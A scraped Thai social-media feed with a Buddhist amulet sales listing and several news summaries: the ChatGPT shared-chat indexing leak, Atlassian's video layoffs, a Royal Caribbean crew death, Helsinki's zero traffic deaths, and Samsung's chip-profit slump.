• เหรียญหลวงปู่แหวนรุ่นครอบจักรวาล กองทัพภาคที่1 จัดสร้าง ปี2520
    เหรียญหลวงปู่แหวนรุ่นครอบจักรวาล กองทัพภาคที่1 จัดสร้าง ปี2520 //พระดีพิธีใหญ๋ เหรียญสวยกริ๊ป (ผิวปีกแมงทับ) // พระสถาพสวยมาก พระสถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ //#รับประกันพระแท้ตลอดชีพครับ //

    ** พุทธคุณเป็นเลิศในเรื่องเมตตามหานิยม ค้าขายเจริญรุ่งเรือง โภคทรัพย์ จะเจริญรุ่งเรือง ไม่ฝืดเคืองขัดสน ค้าขาย ร่ำรวย โชคลาภ เรียกทรัพย์หนุนดวง อยู่ยงคงกระพัน ฟันแทงไม่เข้า แคล้วคลาดการเดินทางแคล้วคลาดปลอดภัย ปราศจากภยันตรายต่างๆ >>

    ** เหรียญหลวงปู่แหวน รุ่นครอบจักรวาล กองทัพภาคที่1 จัดสร้าง ปี2520 ทันหลวงปู่แหวนปลุกเสก เป็นรุ่นที่มีประสบการณ์สูงมาก เพราะได้ปลุกเสกเข้าพิธีใหญ่หลายครั้ง เหรียญรุ่นนี้นอกจากหลวงปู่อธิษฐานจิตให้อย่างดีแล้วโดยเข้าพิธีปลุกเสกพร้อมเหรียญรุ่นเราสู้อันโด่งดังใน วันที่ 1 กรกฎาคม พ.ศ.2520 แล้ว ครูบาอาจารย์ในยุคนั้นปลุกเสกให้อีกครั้ง >>

    ** พระสถาพสวยมาก พระสถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ

    ช่องทางติดต่อ
    LINE 0881915131
    โทรศัพท์ 0881915131
    เหรียญหลวงปู่แหวนรุ่นครอบจักรวาล กองทัพภาคที่1 จัดสร้าง ปี2520 เหรียญหลวงปู่แหวนรุ่นครอบจักรวาล กองทัพภาคที่1 จัดสร้าง ปี2520 //พระดีพิธีใหญ๋ เหรียญสวยกริ๊ป (ผิวปีกแมงทับ) // พระสถาพสวยมาก พระสถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ //#รับประกันพระแท้ตลอดชีพครับ // ** พุทธคุณเป็นเลิศในเรื่องเมตตามหานิยม ค้าขายเจริญรุ่งเรือง โภคทรัพย์ จะเจริญรุ่งเรือง ไม่ฝืดเคืองขัดสน ค้าขาย ร่ำรวย โชคลาภ เรียกทรัพย์หนุนดวง อยู่ยงคงกระพัน ฟันแทงไม่เข้า แคล้วคลาดการเดินทางแคล้วคลาดปลอดภัย ปราศจากภยันตรายต่างๆ >> ** เหรียญหลวงปู่แหวน รุ่นครอบจักรวาล กองทัพภาคที่1 จัดสร้าง ปี2520 ทันหลวงปู่แหวนปลุกเสก เป็นรุ่นที่มีประสบการณ์สูงมาก เพราะได้ปลุกเสกเข้าพิธีใหญ่หลายครั้ง เหรียญรุ่นนี้นอกจากหลวงปู่อธิษฐานจิตให้อย่างดีแล้วโดยเข้าพิธีปลุกเสกพร้อมเหรียญรุ่นเราสู้อันโด่งดังใน วันที่ 1 กรกฎาคม พ.ศ.2520 แล้ว ครูบาอาจารย์ในยุคนั้นปลุกเสกให้อีกครั้ง >> ** พระสถาพสวยมาก พระสถาพสมบูรณ์ หายากก พระไม่ถูกใช้ครับ ช่องทางติดต่อ LINE 0881915131 โทรศัพท์ 0881915131
    0 ความคิดเห็น 0 การแบ่งปัน 5 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: เมื่อบทสนทนาส่วนตัวกับ ChatGPT กลายเป็นสาธารณะใน Google โดยไม่รู้ตัว

    ในช่วงปลายเดือนกรกฎาคม 2025 ผู้ใช้ ChatGPT หลายพันคนต้องตกใจเมื่อพบว่าบทสนทนาส่วนตัวของตนปรากฏในผลการค้นหาของ Google โดยไม่ตั้งใจ สาเหตุเกิดจากฟีเจอร์ “แชร์บทสนทนา” ที่มีตัวเลือกให้ “ทำให้ค้นหาได้” ซึ่งแม้จะต้องกดยืนยันเอง แต่ข้อความอธิบายกลับคลุมเครือและไม่ชัดเจน

    Fast Company พบว่ามีบทสนทนากว่า 4,500 รายการที่ถูกจัดทำเป็นลิงก์สาธารณะ และถูก Google ดึงไปแสดงในผลการค้นหา โดยบางบทสนทนาเผยข้อมูลส่วนตัว เช่น ชื่อ เมืองที่อยู่ อีเมล หรือแม้แต่เรื่องราวส่วนตัวอย่างความวิตกกังวล การเสพติด ความรุนแรงในครอบครัว และปัญหาความสัมพันธ์

    แม้จะไม่มีการเปิดเผยตัวตนโดยตรง แต่เนื้อหาในบทสนทนาเพียงพอที่จะระบุตัวบุคคลได้ในบางกรณี

    OpenAI ได้ลบฟีเจอร์นี้ออกทันที พร้อมดำเนินการให้ Google และเครื่องมือค้นหาอื่น ๆ ลบข้อมูลออกจากดัชนี แต่ก็ยังมีความเสี่ยงจากการแคชหน้าเว็บที่อาจยังคงอยู่

    ฟีเจอร์ “แชร์บทสนทนา” ของ ChatGPT ทำให้บทสนทนาส่วนตัวปรากฏใน Google Search
    ผู้ใช้ต้องกดยืนยัน “ทำให้ค้นหาได้” แต่คำอธิบายไม่ชัดเจน
    มีบทสนทนากว่า 4,500 รายการถูกค้นพบโดย Fast Company

    เนื้อหาที่หลุดออกมามีข้อมูลส่วนตัวและเรื่องราวที่ละเอียดอ่อน
    เช่น ความวิตกกังวล การเสพติด ปัญหาครอบครัว และความสัมพันธ์
    บางบทสนทนาเผยชื่อ เมืองที่อยู่ และข้อมูลติดต่อ

    OpenAI ลบฟีเจอร์ทันทีและดำเนินการให้ลบข้อมูลออกจากเครื่องมือค้นหา
    ระบุว่าเป็น “การทดลองระยะสั้น” เพื่อให้ผู้คนค้นหาบทสนทนาที่มีประโยชน์
    กำลังดำเนินการลบข้อมูลจากดัชนีของ Google

    ผู้ใช้สามารถจัดการลิงก์ที่แชร์ได้ผ่าน Shared Links Dashboard
    แต่การลบลิงก์ไม่รับประกันว่าข้อมูลจะหายจาก Google ทันที
    หน้าแคชอาจยังคงอยู่ในระบบของเครื่องมือค้นหา

    กรณีนี้เกิดขึ้นหลังจากศาลสหรัฐฯ สั่งให้ OpenAI เก็บบันทึกบทสนทนาไว้ทั้งหมด
    เพื่อใช้ในการพิจารณาคดีเกี่ยวกับการละเมิดลิขสิทธิ์
    ทีมกฎหมายสามารถเข้าถึงข้อมูลที่ผู้ใช้ป้อนเข้าไป

    การแชร์บทสนทนาโดยไม่เข้าใจเงื่อนไขอาจทำให้ข้อมูลส่วนตัวหลุดสู่สาธารณะ
    โดยเฉพาะเมื่อมีชื่อ อีเมล หรือข้อมูลบริษัทในบทสนทนา
    แม้จะลบลิงก์แล้ว ข้อมูลอาจยังอยู่ใน Google ผ่านหน้าแคช

    การใช้ ChatGPT เป็นพื้นที่ระบายอารมณ์หรือพูดคุยเรื่องส่วนตัวอาจไม่ปลอดภัย
    ผู้ใช้บางรายใช้ ChatGPT เหมือนสมุดบันทึกส่วนตัว
    แต่ระบบไม่ได้ออกแบบมาเพื่อความเป็นส่วนตัวระดับนั้น

    บริษัทที่ใช้ ChatGPT ในการพัฒนาไอเดียหรือกลยุทธ์อาจเสี่ยงต่อการรั่วไหลของข้อมูล
    เช่น การเขียนโค้ด การประชุม หรือแผนการตลาด
    ข้อมูลภายในอาจถูกเผยแพร่โดยไม่ตั้งใจ

    การเข้าใจผิดเกี่ยวกับฟีเจอร์ “แชร์” อาจนำไปสู่การละเมิดความเป็นส่วนตัวโดยไม่รู้ตัว
    ผู้ใช้บางรายคิดว่าลิงก์จะถูกส่งให้เฉพาะคนที่ตั้งใจ
    แต่จริง ๆ แล้วลิงก์นั้นสามารถถูกค้นเจอได้โดยทุกคน

    https://www.techspot.com/news/108911-thousands-private-chatgpt-conversations-found-google-search-after.html
    🎙️ เรื่องเล่าจากข่าว: เมื่อบทสนทนาส่วนตัวกับ ChatGPT กลายเป็นสาธารณะใน Google โดยไม่รู้ตัว ในช่วงปลายเดือนกรกฎาคม 2025 ผู้ใช้ ChatGPT หลายพันคนต้องตกใจเมื่อพบว่าบทสนทนาส่วนตัวของตนปรากฏในผลการค้นหาของ Google โดยไม่ตั้งใจ สาเหตุเกิดจากฟีเจอร์ “แชร์บทสนทนา” ที่มีตัวเลือกให้ “ทำให้ค้นหาได้” ซึ่งแม้จะต้องกดยืนยันเอง แต่ข้อความอธิบายกลับคลุมเครือและไม่ชัดเจน Fast Company พบว่ามีบทสนทนากว่า 4,500 รายการที่ถูกจัดทำเป็นลิงก์สาธารณะ และถูก Google ดึงไปแสดงในผลการค้นหา โดยบางบทสนทนาเผยข้อมูลส่วนตัว เช่น ชื่อ เมืองที่อยู่ อีเมล หรือแม้แต่เรื่องราวส่วนตัวอย่างความวิตกกังวล การเสพติด ความรุนแรงในครอบครัว และปัญหาความสัมพันธ์ แม้จะไม่มีการเปิดเผยตัวตนโดยตรง แต่เนื้อหาในบทสนทนาเพียงพอที่จะระบุตัวบุคคลได้ในบางกรณี OpenAI ได้ลบฟีเจอร์นี้ออกทันที พร้อมดำเนินการให้ Google และเครื่องมือค้นหาอื่น ๆ ลบข้อมูลออกจากดัชนี แต่ก็ยังมีความเสี่ยงจากการแคชหน้าเว็บที่อาจยังคงอยู่ ✅ ฟีเจอร์ “แชร์บทสนทนา” ของ ChatGPT ทำให้บทสนทนาส่วนตัวปรากฏใน Google Search ➡️ ผู้ใช้ต้องกดยืนยัน “ทำให้ค้นหาได้” แต่คำอธิบายไม่ชัดเจน ➡️ มีบทสนทนากว่า 4,500 รายการถูกค้นพบโดย Fast Company ✅ เนื้อหาที่หลุดออกมามีข้อมูลส่วนตัวและเรื่องราวที่ละเอียดอ่อน ➡️ เช่น ความวิตกกังวล การเสพติด ปัญหาครอบครัว และความสัมพันธ์ ➡️ บางบทสนทนาเผยชื่อ เมืองที่อยู่ และข้อมูลติดต่อ ✅ OpenAI ลบฟีเจอร์ทันทีและดำเนินการให้ลบข้อมูลออกจากเครื่องมือค้นหา ➡️ ระบุว่าเป็น “การทดลองระยะสั้น” เพื่อให้ผู้คนค้นหาบทสนทนาที่มีประโยชน์ ➡️ กำลังดำเนินการลบข้อมูลจากดัชนีของ Google ✅ ผู้ใช้สามารถจัดการลิงก์ที่แชร์ได้ผ่าน Shared Links Dashboard ➡️ แต่การลบลิงก์ไม่รับประกันว่าข้อมูลจะหายจาก Google ทันที ➡️ หน้าแคชอาจยังคงอยู่ในระบบของเครื่องมือค้นหา ✅ กรณีนี้เกิดขึ้นหลังจากศาลสหรัฐฯ สั่งให้ OpenAI เก็บบันทึกบทสนทนาไว้ทั้งหมด ➡️ เพื่อใช้ในการพิจารณาคดีเกี่ยวกับการละเมิดลิขสิทธิ์ ➡️ ทีมกฎหมายสามารถเข้าถึงข้อมูลที่ผู้ใช้ป้อนเข้าไป ‼️ การแชร์บทสนทนาโดยไม่เข้าใจเงื่อนไขอาจทำให้ข้อมูลส่วนตัวหลุดสู่สาธารณะ ⛔ โดยเฉพาะเมื่อมีชื่อ อีเมล หรือข้อมูลบริษัทในบทสนทนา ⛔ แม้จะลบลิงก์แล้ว ข้อมูลอาจยังอยู่ใน Google ผ่านหน้าแคช ‼️ การใช้ ChatGPT เป็นพื้นที่ระบายอารมณ์หรือพูดคุยเรื่องส่วนตัวอาจไม่ปลอดภัย ⛔ ผู้ใช้บางรายใช้ ChatGPT เหมือนสมุดบันทึกส่วนตัว ⛔ แต่ระบบไม่ได้ออกแบบมาเพื่อความเป็นส่วนตัวระดับนั้น ‼️ บริษัทที่ใช้ ChatGPT ในการพัฒนาไอเดียหรือกลยุทธ์อาจเสี่ยงต่อการรั่วไหลของข้อมูล ⛔ เช่น การเขียนโค้ด การประชุม หรือแผนการตลาด ⛔ ข้อมูลภายในอาจถูกเผยแพร่โดยไม่ตั้งใจ ‼️ การเข้าใจผิดเกี่ยวกับฟีเจอร์ “แชร์” อาจนำไปสู่การละเมิดความเป็นส่วนตัวโดยไม่รู้ตัว ⛔ ผู้ใช้บางรายคิดว่าลิงก์จะถูกส่งให้เฉพาะคนที่ตั้งใจ ⛔ แต่จริง ๆ แล้วลิงก์นั้นสามารถถูกค้นเจอได้โดยทุกคน https://www.techspot.com/news/108911-thousands-private-chatgpt-conversations-found-google-search-after.html
    WWW.TECHSPOT.COM
    Thousands of private ChatGPT conversations found via Google search after feature mishap
    OpenAI recently confirmed that it has deactivated an opt-in feature that shared chat histories on the open web. Although the functionality required users' explicit permission, its description...
    0 ความคิดเห็น 0 การแบ่งปัน 10 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: Atlassian ปลดพนักงานผ่านวิดีโอ—เมื่อ AI กลายเป็นเหตุผล และความเห็นใจกลายเป็นคำถาม

    เมื่อวันที่ 30 กรกฎาคม 2025 Atlassian ประกาศเลิกจ้างพนักงาน 150 คนในทีมบริการลูกค้าและสนับสนุน ผ่านวิดีโอที่บันทึกไว้ล่วงหน้าโดย CEO Mike Cannon-Brookes โดยระบุว่าเป็น “การตัดสินใจที่ยากเพื่ออนาคต” และชี้ว่าหลายตำแหน่งจะถูกแทนที่ด้วยระบบ AI

    พนักงานไม่ได้รับข้อมูลส่วนตัวใด ๆ จากวิดีโอ ต้องรออีก 15 นาทีเพื่อรับอีเมลแจ้งสถานะ และทันทีหลังจากนั้น เครื่องมือทำงานของพวกเขาถูกล็อกใช้งาน

    แม้บริษัทจะให้เงินชดเชย 6 เดือน แต่การสื่อสารแบบ “ไม่เห็นหน้า ไม่เอ่ยชื่อ” กลับสร้างเสียงวิจารณ์อย่างหนัก โดยเฉพาะเมื่อ Atlassian เคยยกย่องวัฒนธรรมองค์กรที่เน้นความโปร่งใสและการสื่อสารตรงไปตรงมา

    ขณะเดียวกัน Co-founder อีกคน Scott Farquhar ออกมาสนับสนุนการใช้ AI อย่างเปิดเผย และกล่าวว่า “ทุกคนควรใช้ AI ให้มากที่สุดเท่าที่จะทำได้” พร้อมชี้ว่าเศรษฐกิจจะเปลี่ยนไป และบางงานจะหายไปเพราะ AI ทำได้ดีกว่า

    Atlassian ปลดพนักงาน 150 คนผ่านวิดีโอบันทึกล่วงหน้าโดย CEO Mike Cannon-Brookes
    ไม่เอ่ยชื่อผู้ได้รับผลกระทบ
    พนักงานต้องรออีเมลอีก 15 นาทีเพื่อรู้สถานะของตน

    หลายตำแหน่งถูกแทนที่ด้วยระบบ AI โดยเฉพาะในทีมบริการลูกค้า
    เป็นส่วนหนึ่งของการปรับโครงสร้างองค์กร
    บริษัทลงทุนในระบบอัตโนมัติและ AI เพื่อเพิ่มประสิทธิภาพ

    พนักงานที่ถูกเลิกจ้างได้รับเงินชดเชย 6 เดือน
    บางรายในยุโรปได้รับมากกว่า 12 สัปดาห์ตามกฎหมาย
    บริษัทไม่ได้เปิดเผยภูมิภาคที่ได้รับผลกระทบมากที่สุด

    การสื่อสารผ่านวิดีโอถูกวิจารณ์ว่าไร้ความเห็นใจและไม่เหมาะสม
    ขัดกับค่านิยมเดิมของบริษัทที่เน้นความโปร่งใส
    HR ผู้เชี่ยวชาญชี้ว่าควรมีการพูดคุยแบบเห็นหน้าและให้การสนับสนุน

    Scott Farquhar สนับสนุนการใช้ AI และกล่าวว่า “งานบางประเภทจะหายไป”
    ชี้ว่าเศรษฐกิจจะเปลี่ยนไปตามความสามารถของ AI
    สนับสนุนให้ทุกคนใช้ AI ในชีวิตประจำวัน

    https://www.techspot.com/news/108912-fired-video-atlassian-terminates-150-workers-using-pre.html
    🎙️ เรื่องเล่าจากข่าว: Atlassian ปลดพนักงานผ่านวิดีโอ—เมื่อ AI กลายเป็นเหตุผล และความเห็นใจกลายเป็นคำถาม เมื่อวันที่ 30 กรกฎาคม 2025 Atlassian ประกาศเลิกจ้างพนักงาน 150 คนในทีมบริการลูกค้าและสนับสนุน ผ่านวิดีโอที่บันทึกไว้ล่วงหน้าโดย CEO Mike Cannon-Brookes โดยระบุว่าเป็น “การตัดสินใจที่ยากเพื่ออนาคต” และชี้ว่าหลายตำแหน่งจะถูกแทนที่ด้วยระบบ AI พนักงานไม่ได้รับข้อมูลส่วนตัวใด ๆ จากวิดีโอ ต้องรออีก 15 นาทีเพื่อรับอีเมลแจ้งสถานะ และทันทีหลังจากนั้น เครื่องมือทำงานของพวกเขาถูกล็อกใช้งาน แม้บริษัทจะให้เงินชดเชย 6 เดือน แต่การสื่อสารแบบ “ไม่เห็นหน้า ไม่เอ่ยชื่อ” กลับสร้างเสียงวิจารณ์อย่างหนัก โดยเฉพาะเมื่อ Atlassian เคยยกย่องวัฒนธรรมองค์กรที่เน้นความโปร่งใสและการสื่อสารตรงไปตรงมา ขณะเดียวกัน Co-founder อีกคน Scott Farquhar ออกมาสนับสนุนการใช้ AI อย่างเปิดเผย และกล่าวว่า “ทุกคนควรใช้ AI ให้มากที่สุดเท่าที่จะทำได้” พร้อมชี้ว่าเศรษฐกิจจะเปลี่ยนไป และบางงานจะหายไปเพราะ AI ทำได้ดีกว่า ✅ Atlassian ปลดพนักงาน 150 คนผ่านวิดีโอบันทึกล่วงหน้าโดย CEO Mike Cannon-Brookes ➡️ ไม่เอ่ยชื่อผู้ได้รับผลกระทบ ➡️ พนักงานต้องรออีเมลอีก 15 นาทีเพื่อรู้สถานะของตน ✅ หลายตำแหน่งถูกแทนที่ด้วยระบบ AI โดยเฉพาะในทีมบริการลูกค้า ➡️ เป็นส่วนหนึ่งของการปรับโครงสร้างองค์กร ➡️ บริษัทลงทุนในระบบอัตโนมัติและ AI เพื่อเพิ่มประสิทธิภาพ ✅ พนักงานที่ถูกเลิกจ้างได้รับเงินชดเชย 6 เดือน ➡️ บางรายในยุโรปได้รับมากกว่า 12 สัปดาห์ตามกฎหมาย ➡️ บริษัทไม่ได้เปิดเผยภูมิภาคที่ได้รับผลกระทบมากที่สุด ✅ การสื่อสารผ่านวิดีโอถูกวิจารณ์ว่าไร้ความเห็นใจและไม่เหมาะสม ➡️ ขัดกับค่านิยมเดิมของบริษัทที่เน้นความโปร่งใส ➡️ HR ผู้เชี่ยวชาญชี้ว่าควรมีการพูดคุยแบบเห็นหน้าและให้การสนับสนุน ✅ Scott Farquhar สนับสนุนการใช้ AI และกล่าวว่า “งานบางประเภทจะหายไป” ➡️ ชี้ว่าเศรษฐกิจจะเปลี่ยนไปตามความสามารถของ AI ➡️ สนับสนุนให้ทุกคนใช้ AI ในชีวิตประจำวัน https://www.techspot.com/news/108912-fired-video-atlassian-terminates-150-workers-using-pre.html
    WWW.TECHSPOT.COM
    Fired by video: Atlassian terminates 150 workers using pre-recorded video, sparking criticism
    Australian software giant Atlassian has eliminated 150 jobs as part of a major restructuring of its customer support and services team. The announcement was delivered via a...
    0 ความคิดเห็น 0 การแบ่งปัน 9 มุมมอง 0 รีวิว
  • ขอร่วมแสดงความเสียใจ สมาชิกลูกเรือ Royal Caribbean เสียชีวิตหลังตกเรือนอกชายฝั่งบาฮามาส

    เหตุการณ์โศกนาฏกรรมเกิดขึ้นบนเรือ Icon of the Seas ในช่วงเย็นของวันพฤหัสบดีที่ 24 กรกฎาคม พ.ศ. 2568
    เมื่อลูกเรือคนหนึ่งตกเรือระหว่างการล่องเรือในทะเลแคริบเบียนตะวันออก เจ้าหน้าที่กู้ภัยได้เริ่มปฏิบัติการนำเรือกู้ภัยลงน้ำเพื่อทำการช่วยเหลือทันที สามารถค้นหาและกู้ตัวบุคคลได้สำเร็จภายในเวลาไม่ถึง 30 นาที แต่โชคร้ายที่ลูกเรือท่านนี้เสียชีวิตไปแล้ว

    ทางเราขอแสดงความเสียใจต่อครอบครัวของลูกเรือท่านนี้

    ดูเรือ Royal Caribean ทั้งหมดได้ที่
    https://78s.me/648705

    ดูแพ็คเกจเรือทั้งหมด
    http://cruisedomain.com/
    LINE ID: @CruiseDomain 78s.me/c54029
    Facebook: CruiseDomain 78s.me/b8a121
    Youtube : CruiseDomain 78s.me/8af620
    : 02-1169696

    #เรือRoyalCaribean #RoyalCaribbean #IconoftheSeas #News #ข่าวเรือสำราญ #TravelNews #แพ็คเกจล่องเรือสำราญ #CruiseDomain #thaitimes #News1 #คิงส์โพธิ์แดง #Sondhitalk #คุยทุกเรื่องกับสนธิ #ข่าวอัพเดต #เที่ยว
    ขอร่วมแสดงความเสียใจ สมาชิกลูกเรือ Royal Caribbean เสียชีวิตหลังตกเรือนอกชายฝั่งบาฮามาส เหตุการณ์โศกนาฏกรรมเกิดขึ้นบนเรือ Icon of the Seas ในช่วงเย็นของวันพฤหัสบดีที่ 24 กรกฎาคม พ.ศ. 2568 เมื่อลูกเรือคนหนึ่งตกเรือระหว่างการล่องเรือในทะเลแคริบเบียนตะวันออก เจ้าหน้าที่กู้ภัยได้เริ่มปฏิบัติการนำเรือกู้ภัยลงน้ำเพื่อทำการช่วยเหลือทันที สามารถค้นหาและกู้ตัวบุคคลได้สำเร็จภายในเวลาไม่ถึง 30 นาที แต่โชคร้ายที่ลูกเรือท่านนี้เสียชีวิตไปแล้ว ทางเราขอแสดงความเสียใจต่อครอบครัวของลูกเรือท่านนี้ 💙 ดูเรือ Royal Caribean ทั้งหมดได้ที่ https://78s.me/648705 ✅ ดูแพ็คเกจเรือทั้งหมด http://cruisedomain.com/ LINE ID: @CruiseDomain 78s.me/c54029 Facebook: CruiseDomain 78s.me/b8a121 Youtube : CruiseDomain 78s.me/8af620 ☎️: 02-1169696 #เรือRoyalCaribean #RoyalCaribbean #IconoftheSeas #News #ข่าวเรือสำราญ #TravelNews #แพ็คเกจล่องเรือสำราญ #CruiseDomain #thaitimes #News1 #คิงส์โพธิ์แดง #Sondhitalk #คุยทุกเรื่องกับสนธิ #ข่าวอัพเดต #เที่ยว
    0 ความคิดเห็น 1 การแบ่งปัน 20 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: เฮลซิงกิ เมืองที่ไม่มีใครตายบนถนนตลอดปี—บทพิสูจน์ของการวางแผนระยะยาวและความร่วมมือของทุกฝ่าย

    ย้อนกลับไปเมื่อหลายสิบปีก่อน เฮลซิงกิเคยมีผู้เสียชีวิตจากอุบัติเหตุจราจรถึง 30 รายต่อปี และอุบัติเหตุที่มีผู้บาดเจ็บเกือบ 1,000 ครั้งต่อปี แต่ในปี 2025 เมืองนี้สามารถลดจำนวนผู้เสียชีวิตจากอุบัติเหตุจราจรลงเหลือ “ศูนย์” ได้สำเร็จ

    ความสำเร็จนี้ไม่ได้เกิดจากโชคช่วย แต่เป็นผลจากการวางแผนอย่างต่อเนื่องหลายทศวรรษ โดยมีการปรับปรุงโครงสร้างพื้นฐาน, ลดความเร็วรถ, เพิ่มระบบขนส่งสาธารณะ, และใช้แนวคิด “Vision Zero” ที่เชื่อว่า “ไม่มีใครควรต้องตายจากการใช้ถนน”

    เฮลซิงกิบันทึกปี 2025 โดยไม่มีผู้เสียชีวิตจากอุบัติเหตุจราจรเลยแม้แต่รายเดียว
    ครั้งสุดท้ายที่มีผู้เสียชีวิตคือเดือนกรกฎาคม 2024 ในเขต Kontula
    ถือเป็นเหตุการณ์ที่ไม่เคยเกิดขึ้นมาก่อนในเมืองหลวงยุโรป

    มากกว่าครึ่งของถนนในเฮลซิงกิมีการจำกัดความเร็วไว้ที่ 30 กม./ชม.
    ลดจาก 50 กม./ชม. ที่เคยใช้เมื่อ 50 ปีก่อน
    โดยเฉพาะรอบโรงเรียนและพื้นที่ชุมชน

    มีการออกแบบถนนใหม่เพื่อเพิ่มความปลอดภัย
    เช่น การจัดทางม้าลาย, แยกทางจักรยาน, และลดช่องทางรถยนต์
    ปลูกต้นไม้และสร้างภูมิทัศน์ให้ซับซ้อนเพื่อบังคับให้คนขับระมัดระวัง

    ระบบขนส่งสาธารณะมีประสิทธิภาพสูง ลดการใช้รถยนต์ส่วนตัว
    มีการลงทุนในรถบัสไฟฟ้า, รถรางใหม่, และเครือข่ายจักรยานกว่า 1,500 กม.
    ส่งผลให้จำนวนอุบัติเหตุรุนแรงลดลงอย่างชัดเจน

    มีการใช้กล้องตรวจจับความเร็วและระบบบังคับใช้กฎหมายอัตโนมัติ
    ติดตั้งกล้องใหม่กว่า 70 ตัวทั่วเมือง
    เพิ่มความร่วมมือระหว่างตำรวจและเจ้าหน้าที่เมือง

    กลยุทธ์ Vision Zero ของ EU เป็นแนวทางหลักในการตัดสินใจ
    ตั้งเป้าหมายให้ไม่มีผู้เสียชีวิตจากอุบัติเหตุภายในปี 2050
    ใช้ข้อมูลและการวิเคราะห์ผลกระทบระยะยาวในการวางแผน

    จำนวนอุบัติเหตุที่มีผู้บาดเจ็บลดลงจาก 1,000 เหลือเพียง 277 รายในปีล่าสุด
    สะท้อนถึงผลลัพธ์ของการวางแผนและการออกแบบเมืองที่เน้นความปลอดภัย

    https://www.helsinkitimes.fi/finland/finland-news/domestic/27539-helsinki-records-zero-traffic-deaths-for-full-year.html
    🎙️ เรื่องเล่าจากข่าว: เฮลซิงกิ เมืองที่ไม่มีใครตายบนถนนตลอดปี—บทพิสูจน์ของการวางแผนระยะยาวและความร่วมมือของทุกฝ่าย ย้อนกลับไปเมื่อหลายสิบปีก่อน เฮลซิงกิเคยมีผู้เสียชีวิตจากอุบัติเหตุจราจรถึง 30 รายต่อปี และอุบัติเหตุที่มีผู้บาดเจ็บเกือบ 1,000 ครั้งต่อปี แต่ในปี 2025 เมืองนี้สามารถลดจำนวนผู้เสียชีวิตจากอุบัติเหตุจราจรลงเหลือ “ศูนย์” ได้สำเร็จ ความสำเร็จนี้ไม่ได้เกิดจากโชคช่วย แต่เป็นผลจากการวางแผนอย่างต่อเนื่องหลายทศวรรษ โดยมีการปรับปรุงโครงสร้างพื้นฐาน, ลดความเร็วรถ, เพิ่มระบบขนส่งสาธารณะ, และใช้แนวคิด “Vision Zero” ที่เชื่อว่า “ไม่มีใครควรต้องตายจากการใช้ถนน” ✅ เฮลซิงกิบันทึกปี 2025 โดยไม่มีผู้เสียชีวิตจากอุบัติเหตุจราจรเลยแม้แต่รายเดียว ➡️ ครั้งสุดท้ายที่มีผู้เสียชีวิตคือเดือนกรกฎาคม 2024 ในเขต Kontula ➡️ ถือเป็นเหตุการณ์ที่ไม่เคยเกิดขึ้นมาก่อนในเมืองหลวงยุโรป ✅ มากกว่าครึ่งของถนนในเฮลซิงกิมีการจำกัดความเร็วไว้ที่ 30 กม./ชม. ➡️ ลดจาก 50 กม./ชม. ที่เคยใช้เมื่อ 50 ปีก่อน ➡️ โดยเฉพาะรอบโรงเรียนและพื้นที่ชุมชน ✅ มีการออกแบบถนนใหม่เพื่อเพิ่มความปลอดภัย ➡️ เช่น การจัดทางม้าลาย, แยกทางจักรยาน, และลดช่องทางรถยนต์ ➡️ ปลูกต้นไม้และสร้างภูมิทัศน์ให้ซับซ้อนเพื่อบังคับให้คนขับระมัดระวัง ✅ ระบบขนส่งสาธารณะมีประสิทธิภาพสูง ลดการใช้รถยนต์ส่วนตัว ➡️ มีการลงทุนในรถบัสไฟฟ้า, รถรางใหม่, และเครือข่ายจักรยานกว่า 1,500 กม. ➡️ ส่งผลให้จำนวนอุบัติเหตุรุนแรงลดลงอย่างชัดเจน ✅ มีการใช้กล้องตรวจจับความเร็วและระบบบังคับใช้กฎหมายอัตโนมัติ ➡️ ติดตั้งกล้องใหม่กว่า 70 ตัวทั่วเมือง ➡️ เพิ่มความร่วมมือระหว่างตำรวจและเจ้าหน้าที่เมือง ✅ กลยุทธ์ Vision Zero ของ EU เป็นแนวทางหลักในการตัดสินใจ ➡️ ตั้งเป้าหมายให้ไม่มีผู้เสียชีวิตจากอุบัติเหตุภายในปี 2050 ➡️ ใช้ข้อมูลและการวิเคราะห์ผลกระทบระยะยาวในการวางแผน ✅ จำนวนอุบัติเหตุที่มีผู้บาดเจ็บลดลงจาก 1,000 เหลือเพียง 277 รายในปีล่าสุด ➡️ สะท้อนถึงผลลัพธ์ของการวางแผนและการออกแบบเมืองที่เน้นความปลอดภัย https://www.helsinkitimes.fi/finland/finland-news/domestic/27539-helsinki-records-zero-traffic-deaths-for-full-year.html
    WWW.HELSINKITIMES.FI
    Helsinki records zero traffic deaths for full year
    Helsinki has completed 12 months without a single traffic fatality, a milestone credited to lower speed limits, safer infrastructure, and years of consistent planning, officials say.
    0 ความคิดเห็น 0 การแบ่งปัน 15 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: Samsung กับวิกฤติชิป—กำไรหายไป 94% แต่ยังมีความหวังจาก AI และ Tesla

    Samsung Electronics รายงานผลประกอบการไตรมาส 2 ปี 2025 โดยมีรายได้รวม 74.6 ล้านล้านวอน (ประมาณ 53.7 พันล้านดอลลาร์) ซึ่งเพิ่มขึ้นเล็กน้อยจากปีก่อน แต่สิ่งที่น่าตกใจคือ “กำไรจากธุรกิจชิป” ลดลงถึง 93.8% เหลือเพียง 400 พันล้านวอน จากเดิม 6.45 ล้านล้านวอนในปี 2024

    สาเหตุหลักมาจากการส่งออกที่ชะลอตัว, การปรับมูลค่าสินค้าคงคลัง และข้อจำกัดจากมาตรการของสหรัฐฯ ที่ห้ามส่งออกชิปขั้นสูงไปยังจีน

    แม้สถานการณ์จะดูเลวร้าย แต่ Samsung ยังมีความหวังจากการผลิตชิป AI รุ่นใหม่ให้ Tesla มูลค่าสัญญา 16.5 พันล้านดอลลาร์ และการเตรียมผลิตชิป 2nm สำหรับมือถือในครึ่งปีหลัง ซึ่งอาจช่วยพลิกสถานการณ์ได้

    Samsung รายงานกำไรจากธุรกิจชิปลดลง 93.8% ในไตรมาส 2 ปี 2025
    เหลือเพียง 400 พันล้านวอน จาก 6.45 ล้านล้านวอนในปีก่อน
    เป็นผลประกอบการที่แย่ที่สุดในรอบ 6 ไตรมาส

    รายได้รวมของบริษัทอยู่ที่ 74.6 ล้านล้านวอน เพิ่มขึ้นเล็กน้อยจากปีก่อน
